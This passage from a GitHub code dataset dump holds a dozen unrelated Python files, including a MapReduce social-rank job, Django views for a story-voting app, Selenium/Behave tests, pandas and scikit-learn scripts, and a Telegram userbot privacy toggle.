]\r\n\r\n def mapper_get_friends(self, _, line):\r\n words = line.split()\r\n yield (words[0], words[1])\r\n\r\n def reducer_count_friends(self, id, friends):\r\n frnd = []\r\n for x in friends:\r\n frnd.append(x)\r\n yield (id, (frnd, 1))\r\n\r\n def mapper_socialrank(self, key, friends):\r\n rank = float(friends[1])/float(len(friends[0]))\r\n for x in friends[0]:\r\n yield (x, ([], rank))\r\n yield (key, (friends[0], 0))\r\n\r\n\r\n def reducer_socialrank(self, key, friends):\r\n total = 0\r\n frnd = []\r\n for x in friends:\r\n total += x[1]\r\n frnd = x[0] + frnd\r\n total = 0.15 + 0.85*total\r\n yield (key, (frnd, total))\r\n\r\n\r\nif __name__ == '__main__':\r\n MRMostUsedWord.run()","repo_name":"mobeent/Social-Rank-Algorithm-Using-Map-Reduce","sub_path":"mr_word_count.py","file_name":"mr_word_count.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42496454929","text":"#!/usr/bin/python3\n\"\"\"Creating a class square.\n self: reference the name of the object of instance 'Square'.\n\"\"\"\n\n\nclass Square:\n \"\"\"defining Class square body.\"\"\"\n def __init__(self, __size=0):\n \"\"\"\n Args:\n __size: unaccessible/private field of the init method\n \"\"\"\n if (isinstance(__size, int)):\n if (__size < 0):\n raise ValueError(\"size must be >= 0\")\n self.__size = __size\n else:\n raise TypeError(\"size must be an integer\")\n\n def area(self):\n \"\"\"\n function area is a public method of class \\\n Square that compute the area of the square.\n \"\"\"\n\n return (self.__size * self. __size)\n","repo_name":"Abdulgithub0/alx-higher_level_programming","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40725036129","text":"from datetime import date, timedelta\n\ndef meetup_day(year, month, day, descriptor):\n \n day_of_week = {'Monday': 0, 'Tuesday': 1, 'Wednesday': 2,\n 'Thursday': 3, 'Friday': 4, 'Saturday': 5, 'Sunday': 6}\n\n # Begin with the first day of the month.\n meetup_date = date(year, month, 1)\n\n # Find the first instance of the weekday.\n while meetup_date.weekday() is not day_of_week[day]:\n meetup_date += timedelta(1) # Increment by one day.\n\n if descriptor == '1st':\n return meetup_date\n elif descriptor == '2nd':\n # Increment by a week.\n return meetup_date + timedelta(7)\n elif descriptor == '3rd':\n # Increment by two weeks.\n return meetup_date + timedelta(14)\n elif descriptor == '4th':\n # Increment by three weeks.\n return meetup_date + timedelta(21)\n elif descriptor == 'teenth':\n # Increment by a week until the day is between the 13th and 19th of the month.\n while meetup_date.day < 13:\n meetup_date += timedelta(7)\n return meetup_date\n elif descriptor == 'last':\n # Increment by a week until reaching a new month.\n while meetup_date.month == month:\n meetup_date += timedelta(7)\n return meetup_date - timedelta(7)\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/meetup/51fafb4ed0e54913b19bf0b9ed8bc36d.py","file_name":"51fafb4ed0e54913b19bf0b9ed8bc36d.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"22340026691","text":"from yahooquery import Ticker\r\nimport numpy as np\r\nimport pandas as pd\r\nimport time\r\n\r\npaper = input(\"Type stock code, please: \")\r\nprint(paper)\r\n\r\ntime = time.asctime()\r\nprint(time)\r\n\r\npaper = Ticker(paper)\r\npaper = paper.history(period='7d', interval = \"1m\")\r\n\r\npaper = pd.DataFrame(paper)\r\npaper = paper.tail(100) \r\nhundredLastClosePrice = paper[\"close\"].tolist()\r\n#print(hundredLastClosePrice)\r\naverage = np.average(hundredLastClosePrice)\r\n\r\n\r\n\r\nprint(\"average: \" + str(average))\r\n\r\n\r\n\r\n#data.to_excel(\"STBP3.xlsx\")\r\n\r\n","repo_name":"rogerfidelis/Job-Tools","sub_path":"averageCotation.py","file_name":"averageCotation.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74323700697","text":"# -*- coding: utf-8 -*-\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\n\nfrom config import Config\nfrom util import *\nfrom myio import *\n\n\ncategory_frames = read(Config.get(\"feature.extraction.output.path\"), 250)\ntrain_frame, test_frame = split_train_test(category_frames, test_size=0.1)\nmask = np.asarray(np.ones((1, train_frame.shape[1]), dtype=bool))[0]\nmask[0] = False\ntrain_matrix, test_matrix = dataframe_to_numpy_matrix(train_frame, test_frame, mask)\ntrain_x, train_y = split_target_from_data(train_matrix)\ntest_x, test_y = split_target_from_data(test_matrix)\nattachment_a_frames = read(Config.get(\"attachmentA.feature.extraction.output.path\"), 150)\nattachment_a_frame = concat(attachment_a_frames)\nattachment_a_matrix = dataframe_to_numpy_matrix_single(attachment_a_frame, mask)\nattachment_a_x, attachment_a_y = split_target_from_data(attachment_a_matrix)\n\nscaler = StandardScaler()\ntrain_x = scaler.fit_transform(train_x)\ntest_x = scaler.transform(test_x)\nattachment_a_x = scaler.transform(attachment_a_x)\n\npca = PCA(n_components=300)\ntrain_x = pca.fit_transform(train_x)\ntest_x = pca.transform(test_x)\nattachment_a_x = pca.transform(attachment_a_x)\n\n'''\nclf = OneVsRestClassifier(LogisticRegression(random_state=42))\nparams = {\n 'estimator__C': np.logspace(-3, 3, 7),\n}\nclf = util.fit_cv(clf, train_x, train_y, params)\nprint(\"Best parameters are %s with a score of %0.2f\" % (clf.best_params_, clf.best_score_))\n'''\n\nclf = OneVsRestClassifier(LogisticRegression(verbose=0, random_state=42, C=1000))\nclf.fit(train_x, train_y)\nprint(\"Confusion matrix on training data\")\ntest(clf, train_x, train_y)\nprint(\"Confusion matrix on test data\")\ntest(clf, test_x, test_y)\nprint(\"Confusion matrix on attachment a\")\ntest(clf, attachment_a_x, attachment_a_y)\n\nplot_learning_curve(clf, \"Logistic Regression\", train_x, train_y)\nplt.savefig(\"lc_logreg.png\")\nplt.show()\n","repo_name":"FelixNeutatz/GitHubRepositoryClassifier","sub_path":"model/ml/runLogisticRegression.py","file_name":"runLogisticRegression.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"6561396032","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n dummy1 = ListNode()\n dummy2 = ListNode()\n partitionOne = dummy1\n partitionTwo = dummy2\n currOne = partitionOne\n currTwo = partitionTwo\n while head:\n if head.val < x:\n currOne.next = head\n currOne = currOne.next\n else:\n currTwo.next = head\n currTwo = currTwo.next\n head = head.next\n currTwo.next = None\n currOne.next = partitionTwo.next\n return partitionOne.next\n ","repo_name":"yosefalemu/Competitive-Programming","sub_path":"0086-partition-list/0086-partition-list.py","file_name":"0086-partition-list.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29095359199","text":"# DataFrame: Think of a data frame as a sequence of series (where each series is arranged vertically). So it looks like a excel spreadsheet or 2 dimensional data.\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\n\n# from simple ndarray (numpy array)\ndata=np.random.randn(3,4)\ndf=DataFrame(data, columns=list('ABCD'))\nprint ('df from ndarray \\n%s\\n' % df)\n\n# creating DataFrame from dict of Series or dict of dicts.\n# dictionary keys are column headings (so 'a' and 'b' are columns headings), the nested dictionary is converted to\n# series with data as 'a' and 'b' and index as 0 and 1. Very trivial\nd = {'a': pd.Series(np.random.randn(5)), 'b': { 0: 'a', 1: 'b'}}\ndf = DataFrame(d)\nprint ('df from dict of series/dict \\n%s\\n' % df)\n# if you want 'a' and 'b' (dict keys) to become row index instead. use DataFrame.from_dict() function with the orient parameter\ndf = DataFrame.from_dict(d, orient='index') # 'a' and 'b' will be row labels. columns will be 0, 1, 2, 3, 4\nprint('df from DataFrame.from_dict(orient=index) \\n%s\\n' % df)\n\n# from dict of lists\nd = {'one': [1., 2., 3., 4.], 'two': [4, 3, 2, 1]} # columns are 'one' and 'two'\ndf = DataFrame(d, index=['a', 'b', 'c', 'd'])\nprint('df from dict of lists (almost same as above) \\n%s\\n' % df)\n\n# from list of dicts\nd = [{'a': 1, 'b': 20}, {'a': 1., 'b': 2., 'c': 20.}] # columns will be 'a', 'b', 'c'\ndf = DataFrame(d)\nprint('df from list of dict \\n%s\\n' % df)\n\n# from structure. When your data is in a structured format, like a tuple of values making a row, then you use this ctor\n# 'A', 'B', 'C' are column names, i4, f8 and ? are type codes defined in numpy. i4 means 4 byte integer, f8 is 8 byte float, ? means bool. argument to np.zeros is as many structures you want to define. ie as many rows.\ndata = np.zeros((2,), dtype=[('A', 'i4'), ('B', 'f8'), ('C', '?')])\nprint('raw data for structure \\n%s\\n' % data)\ndata[:] = [(1, 3., False), (10, 9.3466, True)] #data[:] gives a view of the whole data, if we just said data = \n# we would have lost the data type information for every column.\ndf = DataFrame(data)\nprint('df from structure \\n%s\\n' % df)\n\n# let say in the above example, you want to create an index from one of the columns (let say column C (bool)), then you can do that using the from_records ctor\ndata = np.array([(1, 3., False), (10, 9.3466, True)], dtype=[('A', 'i4'), ('B', 'f8'), ('C', '?')])\ndf=DataFrame.from_records(data, index='C')\nprint('df from pd.DataFrame.from_records \\n%s\\n' % df)\n\n\n\n# DataFrame also supports multi indexed (multi columns, multi rows)\n# from dict of tuples\ndata = {('a', 'a'): {('A', 'B'): 1, ('A', 'C'): 6, ('A', 'A'): np.nan, ('D', 'D'): -1},\n ('a', 'b'): {('A', 'B'): 2, ('A', 'C'): 7, ('D', 'D'): -2},\n ('a', 'c'): {('A', 'B'): 3, ('A', 'C'): 8},\n ('b', 'a'): {('A', 'B'): 4, ('A', 'C'): 9},\n ('b', 'b'): {('A', 'B'): 5, ('D', 'D'): -5}}\ndf=DataFrame(data)\nprint('df (multi index) from dict of tuples \\n%s\\n' % df)\n\n# from DataFrame.from_items(arg) used when arg is a list of two tuple (x, y): x is column name(or row name if orient='index') and y is a list of column (or row) values\ndf=DataFrame.from_items([('A', [1, 2, 3]), ('B', [4, 5, 6])])\nprint('df from list of two tuple using from_items()\\n%s\\n' % df)\n# with orient='index'\ndf=DataFrame.from_items([('A', [1, 2, 3]), ('B', [4, 5, 6])], orient='index', columns=['un', 'dos', 'tres'])\nprint('df from list of two tuple using from_items(orient=index)\\n%s\\n' % df)\n","repo_name":"rajatgirotra/study","sub_path":"pythonTutorial/numpy_pandas/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"27059330535","text":"# -*- coding: utf-8 -*-\nimport json\nfrom random import sample\n\nfrom django.shortcuts import render\nfrom django import forms\nfrom django.core import serializers\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom post.models import Story, StoryForm, Vote\nfrom post.recommendations import ProductRecommendationProvider\nfrom register.models import User\n\nrecommender = ProductRecommendationProvider()\n\n@csrf_exempt\ndef create(request):\n # return HttpResponseRedirect('http://www.facebook.com')\n if request.method == 'POST':\n form = StoryForm(request.POST, request.FILES)\n if form.is_valid():\n userID = form.cleaned_data['userID']\n user = User.objects.get(id=userID)\n user.coins += 5\n user.save()\n\n new_story = form.save()\n story = Story.objects.get(pk = new_story.pk)\n story.userName = user.name\n story.save()\n\n response_data = serializers.serialize('json', [story,])\n return HttpResponse(response_data, content_type='application/json')\n else:\n print(form.errors)\n form = StoryForm()\n return render(request, 'temp.html', {'form': form})\n\ndef getStory(request):\n friends = request.GET.getlist('friends[]')\n stories = Story.objects.filter(userID__in = friends).order_by('id').reverse()\n response_data = serializers.serialize('json', stories)\n struct = json.loads(response_data)\n response_data = json.dumps(struct, ensure_ascii=False)\n response = HttpResponse(response_data, content_type='application/json')\n response['Access-Control-Allow-Origin'] = '*'\n response['Access-Control-Allow-Methods'] = 'POST, GET'\n response['Access-Control-Max-Age'] = '1000'\n response['Access-Control-Allow-Headers'] = '*'\n response['charset'] = 'utf-8'\n return response\n\n@csrf_exempt\ndef vote(request):\n if request.method == 'POST':\n storyID = request.POST.get('storyID', '2')\n userFBID = request.POST.get('userFBID', '1')\n score = float(request.POST.get('score', '1'))\n vote = Vote.objects.filter(story_id = storyID, user_id = userFBID)\n story = Story.objects.get(pk = storyID)\n\n if vote.exists():\n vote = vote[0]\n\n if vote.score > 0:\n story.likes += 1\n story.dislikes -= 1\n else:\n story.likes -= 1\n story.dislikes += 1\n vote.score = score\n vote.save()\n else:\n if score > 0:\n story.likes += 1\n else:\n story.dislikes += 1\n vote = Vote.objects.create(story_id = storyID, user_id = userFBID, score = score)\n\n story.save()\n return HttpResponse(status = 201)\n\n response = HttpResponse(rstatus = 200)\n response['Access-Control-Allow-Origin'] = '*'\n response['Access-Control-Allow-Methods'] = 'POST, GET, DELETE'\n response['Access-Control-Max-Age'] = '1000'\n response['Access-Control-Allow-Headers'] = '*'\n return response\n\n@csrf_exempt\ndef deleteVote(request):\n storyID = request.POST['storyID']\n userFBID = request.POST['userFBID']\n score = float(request.POST['score'])\n Vote.objects.filter(story_id = storyID, user_id = userFBID).delete()\n\n story = Story.objects.get(pk = storyID)\n if score > 0:\n story.likes -= 1\n else:\n story.dislikes -= 1\n story.save()\n return HttpResponse(status = 202)\n\ndef getVotes(request):\n storyID = request.GET['storyID']\n userFBID = request.GET['userFBID']\n response_data = serializers.serialize('json', Vote.objects.filter(story_id = storyID, user_id = userFBID))\n struct = json.loads(response_data)\n response_data = json.dumps(struct, ensure_ascii = False)\n response = HttpResponse(response_data, content_type='application/json')\n response['Access-Control-Allow-Origin'] = '*'\n response['Access-Control-Allow-Methods'] = 'POST, GET'\n response['Access-Control-Max-Age'] = '1000'\n response['Access-Control-Allow-Headers'] = '*'\n response['charset'] = 'utf-8'\n return response\n\ndef getUser(request):\n userID = request.GET['userFBID']\n response_data = serializers.serialize('json', [User.objects.get(id = userID),])\n struct = json.loads(response_data)\n response_data = json.dumps(struct, ensure_ascii = False)\n response = HttpResponse(response_data, content_type='application/json')\n response['Access-Control-Allow-Origin'] = '*'\n response['Access-Control-Allow-Methods'] = 'POST, GET'\n response['Access-Control-Max-Age'] = '1000'\n response['Access-Control-Allow-Headers'] = '*'\n response['charset'] = 'utf-8'\n return response\n\ndef recommend(request):\n userID = request.GET.get('userFBID', '0')\n user = User.objects.get(id = userID)\n if(user.coins <= 0):\n return HttpResponse(status = 204)\n user.coins -= 1\n user.save()\n\n # recommender.precompute()\n recommendations = []\n query = list(recommender.storage.get_recommendations_for_user(user = User.objects.get(id = userID)))\n for recommendation in query:\n recommendations.append(recommendation.object)\n if(len(recommendations) < 5):\n count = Story.objects.all().count()\n rand_ids = sample(range(1, count), 5 - len(recommendations))\n stories = list(Story.objects.filter(id__in=rand_ids))\n for story in stories:\n recommendations.append(story)\n\n serialized_string = serializers.serialize('json', recommendations)\n json_string = json.loads(serialized_string)\n response_data = json.dumps(json_string, ensure_ascii=False)\n response = HttpResponse(response_data, content_type='application/json')\n response['Access-Control-Allow-Origin'] = '*'\n response['Access-Control-Allow-Methods'] = 'POST, GET'\n response['Access-Control-Max-Age'] = '1000'\n response['Access-Control-Allow-Headers'] = '*'\n response['charset'] = 'utf-8'\n return response\n","repo_name":"RealWei/Social-Computing-Application-Design","sub_path":"final/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33228019649","text":"\"\"\"\nEnvironment for Behave Testing\n\"\"\"\nfrom behave import *\nfrom os import getenv\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.common.by import By\n\nWAIT_SECONDS = int(getenv('WAIT_SECONDS', '3'))\n# PORT = int(getenv('PORT', 8080))\n# BASE_URL = getenv('BASE_URL', 'http://127.0.0.1:' + str(PORT) + '/app/index.html')\nBASE_URL = getenv('BASE_URL', 'http://127.0.0.1:5000')\n\ndef before_all(context):\n \"\"\" Executed once before all tests \"\"\"\n \n options = webdriver.ChromeOptions()\n options.add_argument(\"start-maximized\") # open browser in maximized mode\n options.add_argument(\"disable-infobars\") # disabling infobars\n options.add_argument(\"--disable-extensions\") # disabling extensions\n options.add_argument(\"--disable-gpu\") # applicable to windows os only\n options.add_argument(\"--disable-dev-shm-usage\") # overcome limited resource problems\n options.add_argument(\"--no-sandbox\") # bypass OS security model\n options.add_argument(\"--headless\")\n\n context.WAIT_SECONDS = WAIT_SECONDS\n\n # enable browser logging\n d = DesiredCapabilities.CHROME\n d['loggingPrefs'] = { 'browser':'ALL' }\n\n context.driver = webdriver.Chrome(options=options, desired_capabilities=d)\n context.driver.set_window_size(1120, 550)\n context.driver.implicitly_wait(context.WAIT_SECONDS) # seconds\n context.base_url = BASE_URL\n # -- SET LOG LEVEL: behave --logging-level=ERROR ...\n # on behave command-line or in \"behave.ini\"\n context.config.setup_logging()\n\ndef after_all(context):\n \"\"\" Executed after all tests \"\"\"\n context.driver.quit()\n\ndef after_scenario(context, scenario):\n # clear the results box for the next feature test\n clear_wishlist_button = context.driver.find_element_by_id(\"wishlist_result_clear\")\n wishlist_result = context.driver.find_element_by_id(\"wishlist_result\")\n actions = ActionChains(context.driver)\n actions.move_to_element(clear_wishlist_button)\n actions.click(clear_wishlist_button)\n actions.perform()\n WebDriverWait(context.driver, WAIT_SECONDS).until(\n expected_conditions.text_to_be_present_in_element(\n (By.ID, \"wishlist_result_status\"),\n \"Awaiting next action\"\n )\n )\n\n clear_item_button = context.driver.find_element_by_id(\"item_result_clear\")\n item_result = context.driver.find_element_by_id(\"item_result\")\n actions = ActionChains(context.driver)\n actions.move_to_element(clear_item_button)\n actions.click(clear_item_button)\n actions.perform()\n WebDriverWait(context.driver, WAIT_SECONDS).until(\n expected_conditions.text_to_be_present_in_element(\n (By.ID, \"item_result_status\"),\n \"Awaiting next action\"\n )\n )\n\n\n# the following are shared Gherkin steps between Wishlists and Items:\n\nbuttonDictionary = {\n \"Create Wishlist\": \"wishlist_create\",\n \"List Wishlists\": \"wishlist_list\",\n \"Read Wishlist\": \"wishlist_read\",\n \"Search Wishlists\": \"wishlist_search\",\n \"Update Wishlist\": \"wishlist_update_0\",\n \"Delete Wishlist\": \"wishlist_delete_0\",\n \"Add Item\": \"item_create\",\n \"Update Item\": \"item_update_0\",\n \"Delete Item\": \"item_delete_0\",\n \"Purchase Item\": \"item_purchase_0\"\n}\n\n@when('I press the button \"{button}\" in the \"{type}\" form')\ndef step_impl(context, button, type):\n button_element = context.driver.find_element_by_id(buttonDictionary[button])\n actions = ActionChains(context.driver)\n actions.move_to_element(button_element)\n actions.click(button_element)\n actions.perform()\n result_field = \"wishlist_result_status\" if type == \"Wishlist\" else \"item_result_status\"\n try:\n WebDriverWait(context.driver, WAIT_SECONDS).until(\n expected_conditions.text_to_be_present_in_element(\n (By.ID, result_field),\n \"Transaction complete\"\n )\n )\n actions.reset_actions()\n finally:\n print('Timeout encountered, browser console logs:')\n for entry in context.driver.get_log('browser'):\n print(entry)\n\n@then('I should see the message \"{message}\" in \"{element_id}\"')\ndef step_impl(context, message, element_id):\n element = context.driver.find_element_by_id(element_id)\n assert message in element.text\n\n@then('the server response code should be \"{code}\" in \"{element_id}\"')\ndef step_impl(context, code, element_id):\n element = context.driver.find_element_by_id(element_id)\n assert code in element.text\n\n@then('the table \"{table_id}\" should contain at least one row')\ndef step_impl(context, table_id):\n table = context.driver.find_element_by_id(table_id)\n html = table.get_attribute(\"innerHTML\")\n assert \"\" in html\n\n@when('I enter \"{search_string}\" in the \"{search_field}\" input field')\ndef step_impl(context, search_string, search_field):\n search_input = context.driver.find_element_by_id(search_field)\n search_input.clear()\n search_input.send_keys(search_string)\n\n@when('I change \"{input_id}\" to \"{new_value}\"')\ndef step_impl(context, input_id, new_value):\n input_element = context.driver.find_element_by_id(input_id)\n input_element.clear()\n input_element.send_keys(new_value)\n\n@then('I should see \"{value}\" in \"{input_id}\"')\ndef step_impl(context, value, input_id):\n input_element = context.driver.find_element_by_id(input_id)\n assert value in input_element.get_attribute('value')\n","repo_name":"NYU-DevOps-Squad-Wishlists/wishlists","sub_path":"features/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33851002126","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# @Author : SUN FEIFEI\nimport time\nimport unittest\n\nfrom app.honor.pc_operation.my_resource.test_cases.delete_tiny_course.delete_course import Delete\nfrom conf.base_page import BasePage\nfrom conf.decorator import testcase, teststeps, setup\nfrom app.honor.teacher.home.vanclass.object_page.home_page import ThomePage\nfrom app.honor.teacher.login.object_page.login_page import TloginPage\nfrom app.honor.teacher.test_bank.object_page.games_detail_page import GamesPage\nfrom app.honor.teacher.test_bank.object_page.test_bank_page import TestBankPage\nfrom app.honor.teacher.user_center.mine_test_bank.object_page.mine_test_bank_page import MineTestBankPage\nfrom app.honor.teacher.user_center.tiny_course.object_page.create_tiny_course_page import CreateTinyCourse\nfrom app.honor.teacher.user_center.tiny_course.object_page.video_page6X import VideoPage\nfrom app.honor.teacher.user_center.tiny_course.test_data.edit_video_name import name_data\nfrom app.honor.teacher.user_center.user_information.object_page.user_center_page import TuserCenterPage\nfrom utils.assert_func import ExpectingTest\nfrom utils.toast_find import Toast\n\n\nclass TinyCourse(unittest.TestCase):\n \"\"\"微课 本地视频 课程名\"\"\"\n @classmethod\n @setup\n def setUp(cls):\n \"\"\"启动应用\"\"\"\n cls.ass_result = unittest.TestResult()\n cls.ass = ExpectingTest(cls, cls.ass_result)\n cls.login = TloginPage()\n cls.home = ThomePage()\n cls.user = TuserCenterPage()\n cls.tiny = CreateTinyCourse()\n cls.video = VideoPage()\n cls.game = GamesPage()\n cls.mine = MineTestBankPage()\n cls.question = TestBankPage()\n\n BasePage().set_assert(cls.ass)\n\n def tearDown(self):\n for i in self.ass.get_error():\n self.ass_result.addFailure(self, i)\n\n def run(self, result=None):\n self.ass_result = result\n super(TinyCourse, self).run(result)\n\n @testcase\n def test_edit_course_name(self):\n self.login.app_status() # 判断APP当前状态\n\n if self.home.wait_check_page(): # 页面检查点\n self.home.click_tab_profile() # 进入首页后点击‘个人中心’按钮\n\n if self.user.wait_check_page(): # 页面检查点\n self.user.click_tiny_course() # 进入 微课页面\n if self.tiny.wait_check_page():\n self.choice_local_video() # 选择视频 具体操作\n self.course_name_operation() # 课程名编辑 具体操作\n else:\n print(\"!!!未进入 微课页面\")\n\n if self.user.wait_check_page(): # 页面检查点\n self.home.click_tab_hw() # 回首页\n # Delete().delete_tiny() # 恢复测试数据\n else:\n Toast().get_toast() # 获取toast\n print(\"!!!未进入主界面\")\n\n @teststeps\n def choice_local_video(self):\n \"\"\"选择本地视频 操作\"\"\"\n print('---------------选择本地视频 操作----------------')\n self.tiny.create_tiny_course() # + 微课内容\n if self.tiny.wait_check_menu_page():\n self.tiny.menu_item()[1].click() # 点击 本地视频\n if self.video.wait_check_local_page():\n self.video.menu_button() # 左上角\n time.sleep(2)\n self.video.video_file_button()\n if self.video.wait_check_video_file_page('视频'):\n self.video.album_button()[0].click()\n\n if self.video.wait_check_local_list_page():\n self.video.album_button()[2].click() # 选择视频\n\n if self.video.wait_check_cut_page(3): # 时长多于3min的视频\n self.video.finish_button()\n\n @teststeps\n def course_name_operation(self):\n \"\"\"课程名编辑 具体操作\"\"\"\n print('=========================编辑课程名 具体操作==========================')\n if self.tiny.wait_check_page():\n for i in range(len(name_data)):\n if self.tiny.wait_check_list_page():\n var = self.tiny.course_name() # 微课名称\n var.send_keys(name_data[i]['name'])\n print('输入微课名称:', var.text) # 编辑课程名称\n self.tiny.save_button() # 点击 保存按钮\n\n if len(name_data[i]) == 2:\n Toast().toast_operation(name_data[i]['assert'])\n print('=============================================================')\n else:\n self.judge_upload_operation() # 判断视频 是否 正在上传中\n\n if self.game.wait_check_page(): # 游戏详情页\n self.home.back_up_button()\n if self.user.wait_check_page():\n self.tiny.judge_save_result(name_data[i]['name']) # 验证视频保存结果\n\n if i != len(name_data)-1:\n print('=============================================================')\n if self.user.wait_check_page(): # 页面检查点\n self.user.click_tiny_course() # 进入 微课页面\n if self.tiny.wait_check_page():\n if self.tiny.wait_check_list_page():\n self.choice_local_video() # 选择视频 具体操作\n\n @teststeps\n def judge_upload_operation(self, var=3):\n \"\"\"判断视频 是否 正在上传中 及取消加入公共题库\"\"\"\n if self.tiny.wait_check_upload_page(): # 上传中....\n # self.upload_rate() # 上传百分率\n # self.upload_num() # 上传数量\n while True:\n if self.tiny.check_upload_progress(): # 上传中....\n time.sleep(1)\n else:\n ThomePage().tips_content_cancel(var) # 提示 页面信息\n break\n\n # @teststeps\n # def recovery_data(self):\n # \"\"\" 恢复测试数据\"\"\"\n # print('------恢复测试数据-----')\n # account_id = GetDBData().get_account_id()\n # print(account_id)\n # for i in range(len(name_data)): # 恢复测试数据\n # if len(name_data[i]) == 1:\n # sql = \"DELETE FROM `testbank` WHERE `account_id` = '{}' AND `name`= '{}'\" \\\n # .format(account_id, name_data[i]['name'])\n # print(sql)\n # ConnectDB().execute_sql(sql)\n","repo_name":"sj542484/test","sub_path":"testfarm/test_program/app/honor/teacher/user_center/tiny_course/test_cases/test007_edit_video_name.py","file_name":"test007_edit_video_name.py","file_ext":"py","file_size_in_byte":6812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4469509409","text":"from sys import stdin\nN = int(input())\nnumL = list(map(int, stdin.readline().split()))\nM = int(input())\ncheckL = list(map(int, stdin.readline().split()))\nnumL.sort()\nfor i in checkL:\n left = 0\n right = len(numL)-1\n isPrint = False\n while left <= right:\n mid = (left+right)//2\n if numL[mid] == i:\n print('1')\n isPrint = True\n break\n elif numL[mid] > i:\n right = mid-1\n else:\n left = mid+1\n if not isPrint:\n print('0')\n","repo_name":"JanSoLul/bj","sub_path":"bj/1000/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14673386810","text":"from pyrogram import Client , Message , Filters\nfrom pyrogram.api import functions , types\nfrom db import r\nimport time\nimport bot\n\n### RECENTLY & ONLINE\n@Client.on_message(Filters.me & Filters.regex(\"^(!nobody|!everybody)$\") , group=18)\ndef setprivacy(app : Client ,msg : Message):\n if \"obody\" in str(msg.text):\n app.send(\n functions.account.SetPrivacy(\n key=types.InputPrivacyKeyStatusTimestamp(),\n rules=[types.InputPrivacyValueDisallowAll()]\n )\n )\n app.edit_message_text(text=bot.botfullprefix + \"Режим невидимки `Вкл`\",\n chat_id=msg.chat.id,\n message_id=msg.message_id,)\n r.set(\"lastseen\", \"NoBody\")\n if r.get(\"autodel\") == \"on\":\n time.sleep(float(r.get(\"autodeltime\")))\n app.delete_messages(msg.chat.id,msg.message_id)\n\n\n else:\n app.send(\n functions.account.SetPrivacy(\n key=types.InputPrivacyKeyStatusTimestamp(),\n rules=[types.InputPrivacyValueAllowAll()]\n )\n )\n\n app.edit_message_text(text=bot.botfullprefix + \"Режим невидимки `Выкл`\",\n chat_id=msg.chat.id,\n message_id=msg.message_id,)\n r.set(\"lastseen\", \"EveryBody\")\n if r.get(\"autodel\") == \"on\":\n time.sleep(float(r.get(\"autodeltime\")))\n app.delete_messages(msg.chat.id,msg.message_id)\n","repo_name":"Conradk10/telegram-multibot","sub_path":"plugins/lastseen.py","file_name":"lastseen.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"14385400791","text":"import pandas as pd\r\nimport making\r\n\r\n\r\nall_group = making.all_group()\r\ntempdf = pd.read_excel(r'C:\\Users\\User\\Downloads\\{}.xlsx'.format(making.ThisYearAttendnce), sheet_name=None)\r\n\r\nprinting= 'yes'#input('명단 프린트할꺼라면 yes라고 치기')\r\n\r\na=[]\r\nb=[]\r\ntemp=[]\r\n\r\n\r\nfiltered_data=[] #먼저 빈리스트 정의하기\r\nfor i in range(len(all_group)): #인덱스가 같은지 보기 (요류 방지용)\r\n df = tempdf[all_group[i]]\r\n df.set_index('날짜\\이름', inplace=True)\r\n\r\n namelist = df.columns\r\n # print(all_group[i], namelist.tolist()) #정렬하기 않고 기존꺼 포현할때 쓰는것\r\n\r\n #프린트 명부에서 제거해야할 명단의 딕셔너리\r\n file_name = \"except_data.txt\"\r\n loaded_data = making.makedictfromtxt(file_name)\r\n\r\n for j in namelist: # 기존 엑셀시트에 있는 이름중\r\n if df[j][(df[j] == 'O') | (df[j] == 'X')].count() >5: # X든 O든 총개수가 5를 넘어야\r\n a.append( (j,float(df.loc[df.index[-1], j])) )\r\n # print(all_group[i],j,df.loc[df.index[-1], j])\r\n else:\r\n b.append( (j,float(df.loc[df.index[-1], j])) )\r\n\r\n\r\n 